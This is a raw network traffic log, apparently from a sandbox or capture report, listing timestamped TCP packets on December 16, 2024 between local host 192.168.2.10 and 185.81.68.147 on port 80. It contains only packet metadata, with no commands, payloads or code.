                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.246922970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.247103930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.247601986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.247807980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.247965097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.248040915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.248665094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.248775959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.248867989 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.249548912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.249602079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.249763966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.250406027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.250526905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.250618935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.251288891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.251400948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.251607895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.252186060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.252266884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.252360106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.253053904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.253158092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.253267050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.254014969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.254141092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.254251957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.254836082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.254924059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.255047083 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.255697012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.255819082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.256278992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.256555080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.256647110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.256733894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.257452011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.270807028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.270896912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.270903111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.271212101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.271354914 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.271375895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.271434069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.271533012 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.272212029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.272336960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.272435904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.273056030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.273263931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.273370028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.273924112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.274041891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.274794102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.274894953 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.274914980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.275697947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.275810003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.409900904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.410044909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.410197973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.410294056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.410403967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.410507917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.411187887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.411348104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.411446095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.412060022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.412250042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.412349939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.412933111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.413033962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.413130999 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.413806915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.413950920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.414048910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.414693117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.414820910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.414921045 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.415548086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.415663004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.415765047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.416460037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.416551113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.416649103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.417370081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.417452097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.417563915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.418262005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.418356895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.418509007 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.419064045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.419131994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.419235945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.419971943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.420094967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.420200109 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.420847893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.420962095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.421068907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.421694994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.421915054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.422019005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.422564983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.422698975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.422805071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.423441887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.423549891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.423655033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.424328089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.424422026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.424524069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.425204992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.425311089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.425419092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.426137924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.426265955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.426371098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.427124023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.427232027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.427356005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.427942038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.428039074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.428141117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.428719997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.428833961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.428939104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.429650068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.429801941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.429902077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.430459976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.430574894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.430674076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.431351900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.431452990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.431552887 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.432226896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.432341099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.432440042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.433083057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.433197975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.433298111 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.433994055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.434200048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.434314966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.434878111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.434978008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.435080051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.436080933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.436157942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.436264038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.436728001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.436821938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.436924934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.437551022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.437653065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.437756062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.438436031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.438524008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.438627005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.439308882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.439397097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.439497948 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.440103054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.440251112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.440351963 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.440970898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.441076040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.441179037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.441837072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.441977978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.442081928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.442749023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.442893028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.442996025 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.443782091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.443866014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.443965912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.444627047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.444786072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.444895983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.445384979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.445494890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.445595026 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.446266890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.446400881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.446506023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.447124958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.447195053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.447292089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.448014021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.448147058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.448246002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.448879957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.449012041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.449114084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.449732065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.463520050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.463597059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.463629961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.463949919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.464050055 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.464070082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.464562893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.464643955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.464664936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.465457916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.465519905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.465542078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.466319084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.466397047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.466437101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.467183113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.467262030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.467323065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.468081951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.468185902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.468189955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.512229919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.602262020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.602392912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.602631092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.602659941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.602689981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.602796078 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.606353998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.606372118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.606383085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.606393099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.606404066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.606415033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.606467009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.606512070 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.607039928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.607362986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.607810974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.607894897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.608042002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.608757019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.608884096 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.608908892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.609100103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.609627008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.609642982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.609755993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.610436916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.610452890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.610567093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.611283064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.611299038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.611411095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.612174034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.612188101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.612277985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.612302065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.612409115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.612531900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.614212036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.614387035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.614475012 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.615137100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.615161896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.615264893 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.615807056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.615953922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.616043091 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.616621971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.616810083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.616900921 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.617469072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.617484093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.617597103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.618294954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.618454933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.618542910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.619232893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.619256020 CET8049723185.81.68.147192.168.2.10
